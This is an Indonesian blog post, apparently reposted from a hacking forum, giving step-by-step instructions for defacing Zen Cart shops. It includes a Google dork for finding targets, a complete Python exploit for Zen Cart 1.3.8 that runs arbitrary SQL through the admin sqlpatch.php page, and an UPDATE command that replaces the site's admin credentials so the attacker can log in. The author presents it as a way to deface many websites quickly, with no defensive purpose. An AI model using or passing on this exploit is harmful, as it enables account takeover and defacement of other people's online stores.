Deface Dgn Mudah Menggunaka Bugs Zen Cart

orang baru mau buat thread, maap kalo repost kalo udah ada yg tau tinggal di lurusin aja ya kk :D

buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

Spoiler Hide

Code:

#!/usr/bin/python

#

# ------- Zen Cart 1.3.8 Remote SQL Execution

# http://www.zen-cart.com/

# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!

# A new version (1.3.8a) is avaible on http://www.zen-cart.com/

#

# BlackH :)

#

#

# Notes: must have admin/sqlpatch.php enabled

#

# clean the database :

#    DELETE FROM `record_company_info` WHERE `record_company_id` = 
(SELECT `record_company_id` FROM `record_company` WHERE 
`record_company_image` = '8d317.php' LIMIT 1);

#    DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):

    global a, b

    for param in sys.argv:

        if(param == '-'+name): return str(sys.argv[b+1])

        b = b + 1

    if(need):

        print '\n#error', "-"+name, 'parameter required'

        exit(1)

if (len(sys.argv) < 2):

    print """

=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=

========================================================================

|                  BlackH <Bl4ck.H@gmail.com>                          |

========================================================================

|                                                                      |

| $system> python """+sys.argv[0]+""" -url <url>                                 |

| Param: <url>      ex: http://victim.com/site (no slash)              |

|                                                                      |

| Note: blind "injection"                                              |

========================================================================

    """

    exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:

    cmd = raw_input('sql@jah$ ') 

    if (cmd == "exit"): exit(1)

    req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))

    if (re.findall('1 statements processed',urllib2.urlopen(req).read())):

        print '>> success (', cmd, ")"

    else:

        print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya

[Image: 92079546.jpg]

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

saya baru belajar kk, katanya sih ada yg bisa nge deface 32 website dlm 1 jam :D
heheh

great : hacker newbie dan admin yg disini

Date	: Rabu, 12 Juni 2013 09.31
Category	: google dork - Shell Hacking - tips trick
Author	: Unknown
Share	: Tweet
Responds	: 0 Comment

Rabu, 12 Juni 2013

0 Deface Dgn Mudah Menggunaka Bugs Zen Cart

Artikel Terkait :

Posting Komentar

Search

Followers

Popular Post

About Author

Recent Comment

Chat Box

Category

Site Info

Arsip Blog